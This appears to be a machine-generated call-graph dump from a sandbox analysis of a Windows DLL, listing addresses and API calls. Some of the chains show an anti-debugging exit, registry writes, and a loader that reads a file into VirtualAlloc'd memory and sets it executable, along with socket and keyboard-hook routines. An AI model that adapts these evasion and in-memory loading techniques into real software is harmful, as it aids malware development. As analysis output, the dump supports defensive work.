4eb1e7d 84209->84211 84244 6d035ae0 send 84245 6d035b5b WSAGetLastError 84244->84245 84252 6d035b6b 84244->84252 84246 6d035b73 84245->84246 84245->84252 84253 6d01a850 61 API calls 3 library calls 84246->84253 84247 6d0489c0 CatchGuardHandler 5 API calls 84249 6d035bc5 84247->84249 84250 6d035b83 84254 6d00a380 82 API calls 2 library calls 84250->84254 84252->84247 84253->84250 84254->84252 84255 6d01e506 84256 6d01e50c 84255->84256 84257 6d03b400 13 API calls 84256->84257 84263 6d01e534 84256->84263 84257->84263 84258 6d01e5a3 84259 6d01ebaf 84258->84259 84264 6d01e5e9 84258->84264 84378 6d05dba4 52 API calls 2 library calls 84258->84378 84265 6d01ec01 84259->84265 84266 6d01ebca 84259->84266 84261 6d03b400 13 API calls 84261->84263 84262 6d01e814 84267 6d01e92e 84262->84267 84268 6d01e82c CertOpenStore 84262->84268 84263->84258 84263->84261 84270 6d01e603 84263->84270 84264->84262 84275 6d01e7ee 84264->84275 84356 6d03b400 84265->84356 84395 6d00a380 82 API calls 2 library calls 84266->84395 84277 6d01e949 84267->84277 84282 6d04fa98 std::locale::_Locimp::~_Locimp 17 API calls 84267->84282 84272 6d01e884 CryptStringToBinaryA 84268->84272 84273 6d01e847 GetLastError 84268->84273 84405 6d00a380 82 API calls 2 library calls 84270->84405 84291 6d01e8e4 CertFindCertificateInStore 84272->84291 84292 6d01e8c4 84272->84292 84380 6d00a380 82 API calls 2 library calls 84273->84380 84274 6d01ec1f 84350 6d01f0f3 __fread_nolock 84274->84350 84355 6d01ec2a __fread_nolock _strncpy 84274->84355 84379 6d00a380 82 API calls 2 library calls 84275->84379 84276 6d0489c0 CatchGuardHandler 5 API calls 84281 6d01f2f0 84276->84281 84301 6d01e9c3 84277->84301 84381 6d050a54 79 API calls _strftime 84277->84381 84278 6d01ebd8 84283 6d01ebe3 CertFreeCertificateContext 84278->84283 84284 6d01ebea 84278->84284 84282->84277 84283->84284 84288 6d01ebee CertCloseStore 84284->84288 84347 6d01e877 84284->84347 84288->84347 84289 6d01e80f 84310 6d04fa98 std::locale::_Locimp::~_Locimp 17 API calls 84289->84310 84289->84347 84290 6d01e95b 84296 6d01e977 84290->84296 84382 6d05941e 59 API calls _strftime 84290->84382 84294 6d01e90c 84291->84294 84295 6d01e906 84291->84295 84297 6d01e8c8 84292->84297 84298 6d01e91b CertCloseStore 84292->84298 84293 6d01f297 84404 6d00a380 82 API calls 2 library calls 84293->84404 84294->84259 84294->84298 84300 6d04fa98 std::locale::_Locimp::~_Locimp 17 API calls 84295->84300 84303 6d01eaa4 84296->84303 84329 6d01e984 84296->84329 84390 6d050a54 79 API calls _strftime 84296->84390 84305 6d04fa98 std::locale::_Locimp::~_Locimp 17 API calls 84297->84305 84298->84347 84300->84294 84302 6d01eb09 84301->84302 84308 6d01ea12 MultiByteToWideChar 84301->84308 84315 6d01ea37 84301->84315 84312 6d01eb25 GetLastError 84302->84312 84313 6d01eb67 CertFindCertificateInStore 84302->84313 84319 6d0513b3 82 API calls 84303->84319 84306 6d01e8ce CertCloseStore 84305->84306 84306->84347 84307 6d01f2ac 84311 6d04fa98 std::locale::_Locimp::~_Locimp 17 API calls 84307->84311 84308->84315 84310->84347 84311->84347 84316 6d01eb30 84312->84316 84317 6d01eb4a 84312->84317 84313->84259 84318 6d01eb83 GetLastError 84313->84318 84320 6d03b400 13 API calls 84315->84320 84392 6d00a380 82 API calls 2 library calls 84316->84392 84393 6d00a380 82 API calls 2 library calls 84317->84393 84394 6d00a380 82 API calls 2 library calls 84318->84394 84324 6d01eab3 84319->84324 84325 6d01ea4b PFXImportCertStore 84320->84325 84391 6d00a380 82 API calls 2 library calls 84324->84391 84325->84302 84326 6d01f235 CertFreeCertificateContext 84327 6d01f23c 84326->84327 84327->84347 84402 6d01a1f0 61 API calls 3 library calls 84327->84402 84328 6d01eb99 CertCloseStore 84328->84347 84329->84303 84383 6d050fc1 66 API calls __fread_nolock 84329->84383 84331 6d01e618 84331->84264 84331->84293 84344 6d01e785 84331->84344 84331->84347 84332 6d01eea8 84338 6d01ef16 84332->84338 84343 6d01eefe 84332->84343 84337 6d01e9a3 84337->84303 84340 6d01e9af 84337->84340 84338->84326 84338->84327 84339 6d01f253 84403 6d00a380 82 API calls 2 library calls 84339->84403 84384 6d0513b3 84340->84384 84341 6d01eec2 84397 6d00a380 82 API calls 2 library calls 84341->84397 84398 6d00a380 82 API calls 2 library calls 84343->84398 84344->84268 84347->84276 84350->84338 84351 6d01f1ca 84350->84351 84399 6d059f6b 55 API calls _strftime 84350->84399 84400 6d01d640 5 API calls 2 library calls 84350->84400 84401 6d00a380 82 API calls 2 library calls 84351->84401 84353 6d01eeaa 84396 6d00a380 82 API calls 2 library calls 84353->84396 84355->84332 84355->84338 84355->84341 84355->84353 84357 6d03b447 84356->84357 84358 6d03b424 GetModuleHandleA GetProcAddress 84356->84358 84359 6d03b60b 84357->84359 84362 6d03b457 __fread_nolock 84357->84362 84358->84357 84360 6d0489c0 CatchGuardHandler 5 API calls 84359->84360 84361 6d03b61d 84360->84361 84361->84274 84363 6d03b4f1 VerSetConditionMask VerSetConditionMask 84362->84363 84364 6d03b51d VerSetConditionMask 84363->84364 84365 6d03b53b 84364->84365 84366 6d03b52e VerSetConditionMask 84364->84366 84367 6d03b55c VerifyVersionInfoW 84365->84367 84372 6d03b553 84365->84372 84366->84365 84367->84372 84368 6d03b5f0 84369 6d0489c0 CatchGuardHandler 5 API calls 84368->84369 84370 6d03b604 84369->84370 84370->84274 84371 6d03b59c 84371->84368 84374 6d03b5c7 84371->84374 84375 6d03b5e9 VerifyVersionInfoW 84371->84375 84372->84368 84372->84371 84373 6d03b400 5 API calls 84372->84373 84373->84371 84376 6d0489c0 CatchGuardHandler 5 API calls 84374->84376 84375->84368 84377 6d03b5e2 84376->84377 84377->84274 84378->84331 84379->84289 84380->84289 84381->84290 84382->84296 84383->84337 84385 6d0513c6 _strftime 84384->84385 84406 6d05128e 84385->84406 84387 6d0513d2 84388 6d04ea10 _strftime 52 API calls 84387->84388 84389 6d01e9b5 84388->84389 84389->84301 84389->84324 84390->84329 84391->84347 84392->84347 84393->84347 84394->84328 84395->84278 84396->84347 84397->84347 84398->84347 84399->84350 84400->84350 84401->84347 84402->84339 84403->84347 84404->84307 84405->84347 84407 6d05129a __FrameHandler3::FrameUnwindToState 84406->84407 84408 6d0512a4 84407->84408 84409 6d0512c7 84407->84409 84432 6d04fc5b 33 API calls 2 library calls 84408->84432 84416 6d0512bf 84409->84416 84417 6d051266 EnterCriticalSection 84409->84417 84412 6d0512e5 84418 6d051325 84412->84418 84414 6d0512f2 84433 6d05131d LeaveCriticalSection __fread_nolock 84414->84433 84416->84387 84417->84412 84419 6d051355 84418->84419 84420 6d051332 84418->84420 84422 6d0503ce ___scrt_uninitialize_crt 77 API calls 84419->84422 84423 6d05134d 84419->84423 84434 6d04fc5b 33 API calls 2 library calls 84420->84434 84424 6d05136d 84422->84424 84423->84414 84435 6d062dad 17 API calls ___free_lconv_mon 84424->84435 84426 6d051375 84427 6d060774 __fread_nolock 52 API calls 84426->84427 84428 6d051381 84427->84428 84436 6d05f5fb 57 API calls _strftime 84428->84436 84430 6d051388 84430->84423 84431 6d05f802 ___free_lconv_mon 17 API calls 84430->84431 84431->84423 84432->84416 84433->84416 84434->84423 84435->84426 84436->84430 84437 6cffa610 84438 6cffa63f 84437->84438 84439 6cffa77c 84437->84439 84460 6cfff3a0 84438->84460 84441 6d0489c0 CatchGuardHandler 5 API calls 84439->84441 84442 6cffa7a1 84441->84442 84445 6cffa6c2 84446 6cffa72c 84445->84446 84486 6cff95e0 84 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 84445->84486 84446->84439 84479 6d010f20 84446->84479 84450 6cffa7d9 84451 6cffa877 84450->84451 84453 6cffa906 84450->84453 84487 6d018e80 84451->84487 84491 6d0054d0 90 API calls 84453->84491 84455 6cffa8c0 84490 6d0021f0 92 API calls 84455->84490 84457 6cffa8db 84457->84439 84458 6d00a450 82 API calls 84457->84458 84458->84439 84459 6d04fa98 17 API calls 84459->84450 84461 6cfff3af 84460->84461 84462 6cfff3cd 84460->84462 84461->84462 84463 6cfff3bd 84461->84463 84464 6cffa645 84462->84464 84465 6cfff48d EnterCriticalSection LeaveCriticalSection 84462->84465 84492 6d01c660 WaitForSingleObjectEx CloseHandle 84463->84492 84464->84445 84485 6d017210 86 API calls 84464->84485 84467 6cfff4b9 84465->84467 84468 6cfff4c5 84465->84468 84493 6d01c650 CloseHandle 84467->84493 84471 6cfff4ca 84468->84471 84472 6cfff4d3 84468->84472 84469 6cfff3c3 84469->84462 84494 6d01c660 WaitForSingleObjectEx CloseHandle 84471->84494 84495 6cfff520 DeleteCriticalSection closesocket __fread_nolock 84472->84495 84473 6cfff4c0 84476 6cfff4dc 84473->84476 84478 6cfff4f2 closesocket 84476->84478 84477 6cfff4d0 84477->84472 84478->84464 84482 6d010f3c 84479->84482 84484 6d010f5f 84479->84484 84480 6d0489c0 CatchGuardHandler 5 API calls 84481 6cffa7cd 84480->84481 84481->84459 84482->84484 84496 6d058b6e GetSystemTimeAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 84482->84496 84484->84480 84485->84445 84486->84446 84497 6d0197a0 55 API calls 2 library calls 84487->84497 84489 6d018eb2 84489->84455 84490->84457 84491->84439 84492->84469 84493->84473 84494->84477 84495->84476 84496->84484 84497->84489 84498 6cff2750 84501 6cff20d0 IsDebuggerPresent 84498->84501 84502 6cff210f GetModuleFileNameA 84501->84502 84503 6cff2107 ExitProcess 84501->84503 84537 6cff1060 84502->84537 84506 6cff21a5 GetEnvironmentVariableA 84508 6cff21e3 84506->84508 84507 6cff2162 RegSetValueExA RegCloseKey 84507->84506 84508->84508 84541 6cff4940 84508->84541 84511 6cff21ff 84515 6cff2222 _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 84511->84515 84591 6cff4b60 54 API calls 4 library calls 84511->84591 84513 6cff22f0 LoadLibraryA GetProcAddress CreateFileA GetFileSize 84514 6cff23d1 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress VirtualAlloc 84513->84514 84524 6cff2366 84513->84524 84516 6cff2476 ReadFile 84514->84516 84536 6cff2421 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 84514->84536 84515->84513 84517 6cff26dc 84515->84517 84518 6cff2490 CloseHandle 84516->84518 84516->84536 84593 6d04fce8 52 API calls 2 library calls 84517->84593 84578 6cff4e70 84518->84578 84521 6cff2451 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 84522 6d0489c0 CatchGuardHandler 5 API calls 84521->84522 84525 6cff2472 84522->84525 84526 6cff238d Sleep 84524->84526 84527 6cff2396 CreateFileA GetFileSize 84524->84527 84556 6cff1e80 84524->84556 84526->84524 84527->84514 84529 6cff26d7 84592 6d04fce8 52 API calls 2 library calls 84529->84592 84535 6cff24db VirtualProtect 84535->84536 84536->84521 84536->84529 84538 6cff1078 84537->84538 84594 6d04fa57 84538->84594 84542 6cff4a0d 84541->84542 84544 6cff4960 84541->84544 84627 6cff1240 54 API calls 2 library calls 84542->84627 84545 6cff4994 84544->84545 84548 6cff4965 _Yarn 84544->84548 84551 6cff49dc 84544->84551 84552 6cff49d3 84544->84552 84614 6d0489ff 84545->84614 84546 6cff4a12 84628 6cff11a0 54 API calls 3 library calls 84546->84628 84548->84511 84550 6cff49a7 84550->84548 84629 6d04fce8 52 API calls 2 library calls 84550->84629 84553 6d0489ff std::_Facet_Register 54 API calls 84551->84553 84552->84545 84552->84546 84553->84548 84634 6cff5c00 AcquireSRWLockExclusive 84556->84634 84558 6cff1f5b 84559 6d0489c0 CatchGuardHandler 5 API calls 84558->84559 84561 6cff20c0 84559->84561 84560 6cff1eb7 __fread_nolock 84560->84558 84642 6cff3840 84560->84642 84561->84524 84564 6cff1ef2 84565 6cff3440 83 API calls 84564->84565 84566 6cff1f1b 84565->84566 84687 6cff5792 ?SetDisablePrintScreen@@YAXH std::ios_base::_Ios_base_dtor std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 84566->84687 84568 6cff1f65 84653 6cff5c60 84568->84653 84570 6cff1fe0 84572 6cff1ff9 84570->84572 84688 6cff5be0 56 API calls 84570->84688 84677 6cff5bc0 84572->84677 84576 6cff205f 84689 6cff5792 ?SetDisablePrintScreen@@YAXH std::ios_base::_Ios_base_dtor std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 84576->84689 84579 6cff4f7e 84578->84579 84584 6cff4e9f 84578->84584 85084 6cff11a0 54 API calls 3 library calls 84579->85084 84581 6cff4ead 84583 6d0489ff std::_Facet_Register 54 API calls 84581->84583 84588 6cff4eba _Yarn __fread_nolock 84583->84588 84584->84579 84584->84581 84586 6cff4f5c 84584->84586 84584->84588 84586->84579 84587 6cff4f63 84586->84587 84589 6d0489ff std::_Facet_Register 54 API calls 84587->84589 84590 6cff4f10 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 84588->84590 85085 6d04fce8 52 API calls 2 library calls 84588->85085 84589->84588 84590->84535 84591->84515 84595 6d04fa6b _strftime 84594->84595 84600 6d04dcd3 84595->84600 84598 6d04ea10 _strftime 52 API calls 84599 6cff1086 RegOpenKeyExA 84598->84599 84599->84506 84599->84507 84601 6d04dd22 84600->84601 84602 6d04dcff 84600->84602 84601->84602 84604 6d04dd2a 84601->84604 84611 6d04fc5b 33 API calls 2 library calls 84602->84611 84612 6d04ecb4 61 API calls 2 library calls 84604->84612 84605 6d0489c0 CatchGuardHandler 5 API calls 84606 6d04de45 84605->84606 84606->84598 84608 6d04ddab 84613 6d04ea4c 17 API calls ___free_lconv_mon 84608->84613 84610 6d04dd17 84610->84605 84611->84610 84612->84608 84613->84610 84615 6d048a04 ___std_exception_copy 84614->84615 84616 6d048a1e 84615->84616 84618 6d048a20 84615->84618 84632 6d05c2c0 EnterCriticalSection LeaveCriticalSection ?SetDisablePrintScreen@@YAXH std::_Facet_Register 84615->84632 84616->84550 84619 6cff11a0 Concurrency::cancel_current_task 84618->84619 84620 6d048a2a std::_Facet_Register 84618->84620 84630 6d04a35e ?SetDisablePrintScreen@@YAXH RaiseException 84619->84630 84633 6d04a35e ?SetDisablePrintScreen@@YAXH RaiseException 84620->84633 84623 6cff11bc 84631 6d04a2b9 52 API calls 2 library calls 84623->84631 84624 6d049ab6 84626 6cff11e3 84626->84550 84627->84546 84628->84550 84630->84623 84631->84626 84632->84615 84633->84624 84635 6cff5c15 84634->84635 84636 6cff5c34 ReleaseSRWLockExclusive 84634->84636 84690 6cff5da0 84635->84690 84699 6d005790 84636->84699 84639 6cff5c48 84639->84560 84640 6cff5c1e 84640->84636 84641 6cff5c25 ReleaseSRWLockExclusive 84640->84641 84641->84560 84773 6cff4600 84642->84773 84645 6d0489ff std::_Facet_Register 54 API calls 84646 6cff39cb 84645->84646 84800 6cff52c9 84646->84800 84648 6cff39e2 84815 6cff4190 84648->84815 84651 6cff1edf 84651->84564 84651->84568 84652 6cff1d10 54 API calls 84652->84651 84654 6cff5c6a 84653->84654 84655 6cff5c70 84653->84655 84654->84570 84656 6cff5c99 84655->84656 84657 6cff5c83 84655->84657 84661 6cff5cac 84656->84661 84974 6cff99a0 58 API calls 84656->84974 84973 6d00a380 82 API calls 2 library calls 84657->84973 84659 6cff5c8e 84659->84570 84662 6cff5cb5 84661->84662 84969 6cff9dd0 84 API calls 84661->84969 84662->84570 84664 6cff5ce7 84665 6cff5cf0 84664->84665 84673 6cff5d15 84664->84673 84975 6cff9f80 141 API calls 84665->84975 84667 6cff5cf6 84667->84570 84668 6cff5d78 84978 6cffa230 98 API calls 84668->84978 84671 6cff5d8f 84671->84570 84673->84668 84674 6cff5d63 84673->84674 84970 6cffa200 84673->84970 84976 6cffa0e0 100 API calls CatchGuardHandler 84673->84976 84977 6cffa230 98 API calls 84674->84977 84676 6cff5d6d 84676->84570 84678 6cff5bc7 84677->84678 84680 6cff202a 84677->84680 85064 6d004fd0 141 API calls 84678->85064 84681 6cff3440 84680->84681 84682 6cff3479 84681->84682 84683 6cff34d4 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 84682->84683 85065 6cff40c0 84682->85065 84683->84576 84685 6cff34cc 84686 6d0513b3 82 API calls 84685->84686 84686->84683 84687->84558 84688->84572 84689->84558 84691 6cff5db4 ?UnInstallKBHook@ 84690->84691 84692 6cff5db1 84690->84692 84694 6cff5e1a 84691->84694 84695 6cff5df7 84691->84695 84692->84640 84694->84640 84695->84694 84705 6d00c170 84695->84705 84697 6cff5e0a 84697->84694 84698 6cff5e11 ?UnInstallKBHook@ 84697->84698 84698->84694 84763 6d062d50 84699->84763 84700 6d0057a7 84700->84639 84701 6d00579e 84701->84700 84770 6d0039b0 GetEnvironmentVariableA 84701->84770 84703 6d005928 84703->84639 84706 6d00c18e WSAStartup 84705->84706 84707 6d00c1cf 84705->84707 84709 6d00c1a1 84706->84709 84710 6d00c1b5 84706->84710 84737 6d03b7e0 84707->84737 84709->84707 84713 6d00c1af WSACleanup 84709->84713 84711 6d0489c0 CatchGuardHandler 5 API calls 84710->84711 84714 6d00c1c8 84711->84714 84712 6d00c1d4 84715 6d00c34c 84712->84715 84716 6d00c1dc GetModuleHandleA 84712->84716 84713->84710 84714->84697 84718 6d0489c0 CatchGuardHandler 5 API calls 84715->84718 84717 6d00c1fc GetProcAddress 84716->84717 84730 6d00c1f1 84716->84730 84720 6d00c21d _strpbrk 84717->84720 84719 6d00c35a 84718->84719 84719->84697 84722 6d00c224 84720->84722 84723 6d00c24c 84720->84723 84721 6d03b400 13 API calls 84724 6d00c331 QueryPerformanceFrequency 84721->84724 84727 6d00c228 84722->84727 84728 6d00c23a LoadLibraryA 84722->84728 84725 6d00c250 GetProcAddress 84723->84725 84726 6d00c271 GetSystemDirectoryA 84723->84726 84724->84715 84725->84726 84729 6d00c25c LoadLibraryExA 84725->84729 84726->84727 84732 6d00c281 84726->84732 84727->84730 84731 6d00c30f GetProcAddress 84727->84731 84728->84727 84729->84727 84730->84721 84731->84730 84733 6d00c31b 84731->84733 84732->84727 84734 6d00c294 GetSystemDirectoryA 84732->84734 84733->84730 84734->84727 84735 6d00c2a0 84734->84735 84735->84727 84736 6d00c2ec LoadLibraryA 84735->84736 84736->84727 84738 6d03b845 84737->84738 84739 6d03b7e9 84737->84739 84738->84712 84740 6d03b400 13 API calls 84739->84740 84741 6d03b7f8 84740->84741 84746 6d00c020 GetModuleHandleA 84741->84746 84743 6d03b80d 84744 6d03b819 GetProcAddress 84743->84744 84745 6d03b829 84743->84745 84744->84745 84745->84712 84747 6d00c036 84746->84747 84748 6d00c03a GetProcAddress 84746->84748 84747->84743 84749 6d00c059 _strpbrk 84748->84749 84750 6d00c060 84749->84750 84751 6d00c082 84749->84751 84752 6d00c073 LoadLibraryA 84750->84752 84753 6d00c064 84750->84753 84754 6d00c086 GetProcAddress 84751->84754 84755 6d00c0a8 GetSystemDirectoryA 84751->84755 84752->84743 84753->84743 84754->84755 84756 6d00c096 LoadLibraryExA 84754->84756 84757 6d00c155 84755->84757 84758 6d00c0c0 84755->84758 84756->84743 84757->84743 84758->84757 84759 6d00c0e3 GetSystemDirectoryA 84758->84759 84759->84757 84760 6d00c0f2 84759->84760 84761 6d00c131 84760->84761 84762 6d00c14c LoadLibraryA 84760->84762 84761->84743 84762->84757 84768 6d062d5d _strftime 84763->84768 84764 6d062d9d 84772 6d051f98 17 API calls __dosmaperr 84764->84772 84765 6d062d88 RtlAllocateHeap 84767 6d062d9b 84765->84767 84765->84768 84767->84701 84768->84764 84768->84765 84771 6d05c2c0 EnterCriticalSection LeaveCriticalSection ?SetDisablePrintScreen@@YAXH std::_Facet_Register 84768->84771 84770->84703 84771->84768 84772->84767 84774 6cff1d10 54 API calls 84773->84774 84775 6cff467c 84774->84775 84776 6d0489ff std::_Facet_Register 54 API calls 84775->84776 84777 6cff4683 84776->84777 84778 6cff52c9 60 API calls 84777->84778 84779 6cff469d 84778->84779 84825 6cff4fc6 84779->84825 84782 6cff4fc6 std::_Lockit::_Lockit 7 API calls 84783 6cff46f8 84782->84783 84785 6cff5020 std::_Lockit::~_Lockit 2 API calls 84783->84785 84786 6cff4719 84785->84786 84796 6cff478b 84786->84796 84838 6cff18d0 98 API calls 7 library calls 84786->84838 84788 6cff476f 84789 6cff477b 84788->84789 84790 6cff4808 84788->84790 84839 6cff5297 54 API calls std::_Facet_Register 84789->84839 84840 6cff17e0 54 API calls 3 library calls 84790->84840 84792 6cff47a7 84795 6cff47ea 84792->84795 84797 6cff1d10 54 API calls 84792->84797 84794 6cff480d 84798 6d0489c0 CatchGuardHandler 5 API calls 84795->84798 84831 6cff5020 84796->84831 84797->84795 84799 6cff3941 84798->84799 84799->84645 84801 6cff52d5 __EH_prolog3 84800->84801 84802 6cff4fc6 std::_Lockit::_Lockit 7 API calls 84801->84802 84803 6cff52e0 84802->84803 84814 6cff5322 84803->84814 84845 6cff542c 54 API calls 2 library calls 84803->84845 84805 6cff5346 84808 6cff5020 std::_Lockit::~_Lockit 2 API calls 84805->84808 84806 6cff5335 ?SetDisablePrintScreen@@YAXH 84806->84805 84807 6cff52f3 84846 6cff544f 54 API calls std::locale::_Setgloballocale 84807->84846 84810 6cff534e __DllMainCRTStartup@12 84808->84810 84810->84648 84811 6cff52fb 84847 6cff5221 17 API calls 3 library calls 84811->84847 84813 6cff5311 ?SetDisablePrintScreen@@YAXH 84813->84814 84814->84805 84814->84806 84816 6cff41ca 84815->84816 84824 6cff42b4 84815->84824 84848 6cff58cf 84816->84848 84818 6d0489c0 CatchGuardHandler 5 API calls 84820 6cff3a84 84818->84820 84820->84651 84820->84652 84822 6cff425d 84857 6cff4810 92 API calls 5 library calls 84822->84857 84824->84818 84826 6cff4fdc 84825->84826 84827 6cff4fd5 84825->84827 84830 6cff46d4 84826->84830 84842 6cff58fb EnterCriticalSection 84826->84842 84841 6d051483 6 API calls std::_Lockit::_Lockit 84827->84841 84830->84782 84830->84786 84832 6d051491 84831->84832 84833 6cff502a 84831->84833 84844 6d05146c LeaveCriticalSection 84832->84844 84834 6cff503d 84833->84834 84843 6cff5909 LeaveCriticalSection 84833->84843 84834->84792 84837 6d051498 84837->84792 84838->84788 84839->84796 84840->84794 84841->84830 84842->84830 84843->84834 84844->84837 84845->84807 84846->84811 84847->84813 84849 6cff5852 84848->84849 84851 6cff41d4 84849->84851 84858 6d051ece 84849->84858 84851->84824 84856 6d051220 52 API calls 2 library calls 84851->84856 84854 6cff58b9 84854->84851 84855 6d0513b3 82 API calls 84854->84855 84855->84851 84856->84822 84857->84824 84859 6d051e17 __FrameHandler3::FrameUnwindToState 84858->84859 84860 6d051e2a 84859->84860 84863 6d051e4a 84859->84863 84892 6d051f98 17 API calls __dosmaperr 84860->84892 84862 6d051e2f 84893 6d04fcd8 52 API calls _strftime 84862->84893 84865 6d051e5c 84863->84865 84866 6d051e4f 84863->84866 84878 6d06376d 84865->84878 84894 6d051f98 17 API calls __dosmaperr 84866->84894 84867 6cff589e 84867->84851 84877 6d050a54 79 API calls _strftime 84867->84877 84871 6d051e6c 84895 6d051f98 17 API calls __dosmaperr 84871->84895 84872 6d051e79 84886 6d06432d 84872->84886 84877->84854 84879 6d063779 __FrameHandler3::FrameUnwindToState 84878->84879 84897 6d051424 EnterCriticalSection 84879->84897 84881 6d063787 84898 6d063811 84881->84898 84887 6d0642aa 84886->84887 84919 6d05f0f5 84887->84919 84890 6d051e8e 84896 6d051eb7 LeaveCriticalSection __fread_nolock 84890->84896 84892->84862 84894->84867 84895->84867 84896->84867 84897->84881 84905 6d063834 84898->84905 84899 6d06388c 84900 6d062d50 __Getctype 17 API calls 84899->84900 84902 6d063895 84900->84902 84903 6d05f802 ___free_lconv_mon 17 API calls 84902->84903 84904 6d06389e 84903->84904 84910 6d063794 84904->84910 84916 6d06347d 7 API calls std::_Lockit::_Lockit 84904->84916 84905->84899 84905->84905 84905->84910 84914 6d051266 EnterCriticalSection 84905->84914 84915 6d05127a LeaveCriticalSection 84905->84915 84907 6d0638bd 84917 6d051266 EnterCriticalSection 84907->84917 84911 6d0637cd 84910->84911 84918 6d05146c LeaveCriticalSection 84911->84918 84913 6d051e65 84913->84871 84913->84872 84914->84905 84915->84905 84916->84907 84917->84910 84918->84913 84921 6d05f114 84919->84921 84920 6d05f13c 84926 6d05f25c 84920->84926 84941 6d068004 52 API calls 2 library calls 84920->84941 84921->84920 84922 6d05f127 84921->84922 84939 6d051f98 17 API calls __dosmaperr 84922->84939 84924 6d05f12c 84940 6d04fcd8 52 API calls _strftime 84924->84940 84927 6d05f137 84926->84927 84944 6d051f98 17 API calls __dosmaperr 84926->84944 84927->84890 84936 6d05a9a8 84927->84936 84929 6d05f30d 84945 6d04fcd8 52 API calls _strftime 84929->84945 84932 6d05f2ac 84932->84926 84942 6d068004 52 API calls 2 library calls 84932->84942 84934 6d05f2ca 84934->84926 84943 6d068004 52 API calls 2 library calls 84934->84943 84946 6d05a338 84936->84946 84939->84924 84941->84932 84942->84934 84943->84926 84944->84929 84947 6d05a344 __FrameHandler3::FrameUnwindToState 84946->84947 84948 6d05a34b 84947->84948 84950 6d05a376 84947->84950 84966 6d051f98 17 API calls __dosmaperr 84948->84966 84957 6d05a93a 84950->84957 84951 6d05a350 84967 6d04fcd8 52 API calls _strftime 84951->84967 84956 6d05a35a 84956->84890 84958 6d05a19e __wsopen_s 53 API calls 84957->84958 84959 6d05a95c 84958->84959 84960 6d054f2a _strftime 20 API calls 84959->84960 84961 6d05a969 84960->84961 84962 6d05a970 84961->84962 84963 6d05a9c8 __wsopen_s 103 API calls 84961->84963 84964 6d05a39a 84962->84964 84965 6d05f802 ___free_lconv_mon 17 API calls 84962->84965 84963->84962 84968 6d05a3cd LeaveCriticalSection __wsopen_s 84964->84968 84965->84964 84966->84951 84968->84956 84969->84664 84979 6cffbfe0 84970->84979 84972 6cffa21d 84972->84673 84973->84659 84974->84661 84975->84667 84976->84673 84977->84676 84978->84671 84980 6cffc6d5 84979->84980 84981 6cffc03a 84979->84981 84982 6d0489c0 CatchGuardHandler 5 API calls 84980->84982 84981->84980 84984 6cffc04f 84981->84984 84985 6cffc06a 84981->84985 84983 6cffc6f2 84982->84983 84983->84972 84986 6d0489c0 CatchGuardHandler 5 API calls 84984->84986 84987 6cffc073 84985->84987 84992 6cffc090 84985->84992 84988 6cffc063 84986->84988 84989 6d0489c0 CatchGuardHandler 5 API calls 84987->84989 84988->84972 84990 6cffc089 84989->84990 84990->84972 85019 6cffbee0 84992->85019 84993 6cffc104 84994 6cffc159 84993->84994 85007 6cffc175 84993->85007 84997 6d0489c0 CatchGuardHandler 5 API calls 84994->84997 84995 6cffc2f9 getsockopt 85005 6cffc2a0 84995->85005 85000 6cffc16e 84997->85000 84998 6cffc3d6 WSAWaitForMultipleEvents 85014 6cffc3f3 84998->85014 84999 6cffc3bf 84999->84998 85009 6cffc64e 84999->85009 84999->85014 85000->84972 85001 6cffc335 send 85001->85005 85002 6cffc3b7 85002->84999 85027 6d018710 85002->85027 85003 6cffc63e WSAResetEvent 85003->85009 85004 6cffc209 getsockopt 85004->85007 85005->84995 85005->85001 85005->85002 85006 6cffc267 WSAEventSelect 85006->85002 85006->85007 85007->85004 85007->85005 85007->85006 85008 6cffc23c send 85007->85008 85008->85007 85009->84980 85010 6cffbee0 7 API calls 85009->85010 85011 6cffc6aa 85010->85011 85011->84980 85016 6cffc6c4 85011->85016 85012 6cffc5dc WSAEnumNetworkEvents 85013 6cffc60b WSAEventSelect 85012->85013 85012->85014 85013->85014 85014->85003 85014->85012 85014->85013 85015 6cffc63a 85014->85015 85015->85003 85057 6d018bc0 WSASetLastError Sleep 85016->85057 85018 6cffc6d2 85018->84980 85020 6cffbef6 85019->85020 85021 6cffbf04 85019->85021 85020->84993 85022 6cffbfc7 85021->85022 85058 6cffeec0 85021->85058 85022->84993 85024 6cffbf18 85062 6d011da0 5 API calls CatchGuardHandler 85024->85062 85026 6cffbf3f 85026->84993 85028 6d018734 85027->85028 85034 6d01874c 85027->85034 85028->85034 85048 6d01879a 85028->85048 85029 6d018a6c 85030 6d0489c0 CatchGuardHandler 5 API calls 85029->85030 85032 6d018a7d 85030->85032 85031 6d018a65 Sleep 85031->85029 85032->84999 85033 6d018776 WSASetLastError 85036 6d0489c0 CatchGuardHandler 5 API calls 85033->85036 85034->85029 85034->85033 85035 6d018a4d 85034->85035 85053 6d018a46 85034->85053 85035->85031 85035->85053 85039 6d018793 85036->85039 85037 6d0188ef WSASetLastError 85040 6d0188fd 85037->85040 85038 6d0188c8 85041 6d018916 85038->85041 85043 6d0188d4 85038->85043 85039->84999 85042 6d0489c0 CatchGuardHandler 5 API calls 85040->85042 85045 6d01892e select 85041->85045 85044 6d01890f 85042->85044 85063 6d018bc0 WSASetLastError Sleep 85043->85063 85044->84999 85047 6d018972 85045->85047 85050 6d018978 85047->85050 85056 6d018994 85047->85056 85048->85037 85048->85038 85049 6d0188e7 85049->85047 85050->85040 85051 6d01897d WSAGetLastError 85050->85051 85051->85040 85052 6d0189b3 __WSAFDIsSet 85054 6d0189e4 __WSAFDIsSet 85052->85054 85052->85056 85053->85031 85053->85035 85055 6d018a02 __WSAFDIsSet 85054->85055 85054->85056 85055->85056 85056->85052 85056->85053 85056->85054 85056->85055 85057->85018 85059 6cffeecd QueryPerformanceCounter 85058->85059 85060 6cffef31 GetTickCount 85058->85060 85061 6cffeef2 __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 85059->85061 85060->85024 85061->85024 85062->85026 85063->85049 85064->84680 85066 6cff40dd 85065->85066 